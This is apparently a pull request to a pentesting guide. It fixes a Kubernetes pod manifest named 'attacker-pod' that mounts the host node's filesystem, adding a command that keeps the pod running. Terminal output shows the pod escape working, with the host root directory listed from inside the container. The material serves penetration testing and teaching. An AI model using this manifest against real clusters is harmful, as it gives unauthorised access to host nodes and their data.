### PR TITLE
docs: update pod escape manifest with command

### DIFF
--- a/pentesting-cloud/kubernetes-security/kubernetes-enumeration.md
+++ b/pentesting-cloud/kubernetes-security/kubernetes-enumeration.md
@@ -500,6 +500,7 @@ spec:
   - image: ubuntu
     imagePullPolicy: Always
     name: attacker-pod
+    command: ["/bin/sh", "-c", "sleep infinity"]
     volumeMounts:
       - name: host-fs
         mountPath: /root


### PR DESCRIPTION
Ahoy! 

Just a small update to the pod spec manifest for escaping from Kubernetes pod to the host node.
Currently, there isn't a `command` field defined. This results in the pod immediately exiting to a "Completed" status, which means one cannot follow up with a `kubectl exec`. See snippet below:
```bash
controlplane $ k get pods
NAME           READY   STATUS              RESTARTS   AGE
attacker-pod   0/1     ContainerCreating   0          2s
controlplane $ k get pods -w
NAME           READY   STATUS              RESTARTS   AGE
attacker-pod   0/1     ContainerCreating   0          4s
attacker-pod   0/1     Completed           0          4s
attacker-pod   0/1     Completed           0          5s
controlplane $ kubectl exec -it attacker-pod -- bash
error: cannot exec into a container in a completed pod; current phase is Succeeded
controlplane $ 
```

This PR updates the example with a `command` to keep the pod running indefinitely, allowing the user to `exec` and escape the pod. Post-change snippet below:
```bash
controlplane $ k apply -f pod.yaml 
pod/attacker-pod created
controlplane $ k get pods -w
NAME           READY   STATUS              RESTARTS   AGE
attacker-pod   0/1     ContainerCreating   0          1s
attacker-pod   1/1     Running             0          2s
controlplane $ kubectl exec -it attacker-pod -- sh
/ # ls /root/
bin         dev         home        lib32       libx32      media       opt         root        sbin        srv         sys         usr
boot        etc         lib         lib64       lost+found  mnt         proc        run         snap        swapfile    tmp         var
/ # 
```

Cheers!